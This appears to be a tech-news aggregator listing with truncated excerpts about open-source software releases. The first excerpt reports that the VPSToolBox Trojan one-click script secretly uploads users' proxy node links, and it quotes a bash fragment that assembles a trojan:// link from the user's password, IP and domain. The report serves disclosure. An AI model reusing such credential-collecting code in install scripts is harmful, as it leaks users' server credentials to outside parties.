
Trojan’s well-known one-click script VPSToolBox contains malicious code- News Fast Delivery

V2EX ( users found Trojan one-click script VPSToolBox containsMalicious code will upload the link of the Trojan node created by the user to the remote server. clean_env(){ prasejson cd /root echo “trojan://${password1}@${myip}:${trojanport}?security=tls&headerType=none&type=tcp&sni=${domain}#Trojan($(nproc –all)C$(grep MemTotal /proc/meminfo | awk ‘{print $2}’ | xargs -I {} echo “scale=1; {}/1024^2″ | bc)G ${route_final}${mycountry} ${myip_org} ${myip} ${myipv6} ${target_speed_up} Mbps)”

Trojan’s well-known one-click script VPSToolBox contains malicious code- News Fast Delivery Read More »

OrientDB API Homepage, Documentation and Downloads – High Performance Documentation and Graph Database – News Fast Delivery

OrientDB is a high-performance document and graph database, which has a great speed advantage in relational search and traversal, especially when dealing with join operations in traditional relational databases, graph databases have incomparable advantages. Although OrientDB officially provides a Java SDK, there is still a certain learning cost, and manual operation scripts are required. This

OrientDB API Homepage, Documentation and Downloads – High Performance Documentation and Graph Database – News Fast Delivery Read More »

UEditorPlus v3.0.0 interface request header parameters, line break insertion optimization, optimization of several issues- News Fast Delivery

UEditor is an open source WYSIWYG rich text editor developed by Baidu. Based on the MIT open source protocol, this rich text editor helps many website developers solve the difficulties of rich text editors. UEditorPlus is a rich text editor based on the secondary development of UEditor by the ModStart team. It mainly customizes the

UEditorPlus v3.0.0 interface request header parameters, line break insertion optimization, optimization of several issues- News Fast Delivery Read More »

Tailwind CSS v3.3 released, supports ESM/TS, rich palette colors- News Fast Delivery

Tailwind CSS v3.3 brings a lot of new content, the updated content is as follows: Extended Dark Color Palette: In Tailwind CSS v3.3, a new950tone, which is a darker tone ESM and TypeScript support: Tailwind CSS can now be configured in ESM and TypeScript Simplified RTL support with logical attributes: Now you can use logical

Tailwind CSS v3.3 released, supports ESM/TS, rich palette colors- News Fast Delivery Read More »

LAION-AI releases OpenFlamingo, an open source alternative to GPT-4- News Fast Delivery

The non-profit organization LAION-AI released OpenFlamingo, a framework for training and evaluating large multimodal models (LMMs), part of DeepMind’s Flamingo model (a multimodal model capable of processing and reasoning about images, videos, and text) framework for dynamic content). The Demo page of its dataset OpenFlamingo-9B shows the training results, and users can upload pictures for

LAION-AI releases OpenFlamingo, an open source alternative to GPT-4- News Fast Delivery Read More »

FlowJob Homepage, Documentation and Downloads – Task Scheduling Framework – News Fast Delivery

The FlowJob task scheduling framework supports delay, timing, and corn tasks; task distribution supports random, polling, consistent hash, broadcast, failover, MapReduce and other modes; supports task scheduling, DAG workflow, and supports execution in the workflow rule judgment. flowjobIt is mainly used to build a unified task scheduling platform, which is convenient for all business parties

FlowJob Homepage, Documentation and Downloads – Task Scheduling Framework – News Fast Delivery Read More »

AMD-Xilinx Open Source LLVM-Based Nanotube Compiler- News Fast Delivery

AMD-Xilinx recently open-sourced their LLVM-based Nanotube compiler. According to the introduction, the AMD-Xilinx Nanotube compiler takes eBPF XDP C code and builds on top of the LLVM compiler stack, which can then generate a packet processing pipeline in HLS C++ that can run on Xilinx FPGAs. Nanotube is a collection of compiler channels, libraries and

AMD-Xilinx Open Source LLVM-Based Nanotube Compiler- News Fast Delivery Read More »

The Dark language will be restructured into DarklangGPT, mainly for AI to write code- News Fast Delivery

CircleCI founder Paul Biggar is the author of the Darklang programming language. He recently announced in a blog that the Darklang team will devote all its efforts to AI/GPT. Darklang will be restructured into a complete set of AI-driven infrastructure, and most of the code will be generated by AI. . Darklang is a programming

The Dark language will be restructured into DarklangGPT, mainly for AI to write code- News Fast Delivery Read More »

Stanford University released the open source robotic arm ALOHA, which has the ability to imitate learning- News Fast Delivery – Chinese Open Source Technology Exchange Community

ALOHA, A Low-cost Open-source Hardware System for Bimanual Teleoperation, is a low-cost open source two-handed remote operation hardware system, that is, an open source robotic arm, which can be used for two-handed remote operation robots to perform fine tasks (such as rolling or stripping cables). eggshells), dynamic tasks such as bouncing a ping pong ball,

Stanford University released the open source robotic arm ALOHA, which has the ability to imitate learning- News Fast Delivery – Chinese Open Source Technology Exchange Community Read More »

The 15 sub-forums are not to be missed, and GOTC 2023 is about to kick off! – Personal space of News Fast Delivery editorial department- News Fast Delivery

Global Open-source Technology Conference, GOTC 2023 Jointly sponsored by Open Atom Open Source Foundation, Linux Foundation Asia Pacific, Shanghai Pudong Software Park and Open Source China, It will be held in Shanghai Zhangjiang Science Hall from May 27th to 28th.Currently, the General Assembly Registration channel is open: The 2-day open source industry event will

The 15 sub-forums are not to be missed, and GOTC 2023 is about to kick off! – Personal space of News Fast Delivery editorial department- News Fast Delivery Read More »

Darklang Homepage, Documentation and Downloads – Dark Programming Language – News Fast Delivery

Darklang is a programming language (with built-in infrastructure) for “deployless” deployment. Strictly speaking, it is a mixture of language, editor and infrastructure, mainly used to build back-end web services. The original intention of Darklang is to break the explosion of tool sets and make it easier to deploy code to the production environment: programmers only

Darklang Homepage, Documentation and Downloads – Dark Programming Language – News Fast Delivery Read More »

Open source in-memory database DragonflyDB 1.0 officially GA, can replace Redis – News Fast Delivery

DragonflyDB is a modern open source in-memory database, compatible with Redis and Memcached API, no need to modify any code when migrating, and can be used as an alternative to both. Compared with traditional memory data storage, DragonflyDB provides higher throughput and cache hit ratio, lower tail-latency, and convenient vertical scalability. DragonflyDB implements a new

Open source in-memory database DragonflyDB 1.0 officially GA, can replace Redis – News Fast Delivery Read More »

GnuCash 5.0 released, cross-platform financial management software- News Fast Delivery

GnuCash 5.0 is out now, and this version brings several new features. GnuCash is a financial software suitable for individuals or small businesses. It is open source under the GPL agreement and supports GNU / Linux, BSD, Solaris, Mac OS X and Microsoft Windows. GnuCash is easy to use and powerful enough to track bank

GnuCash 5.0 released, cross-platform financial management software- News Fast Delivery Read More »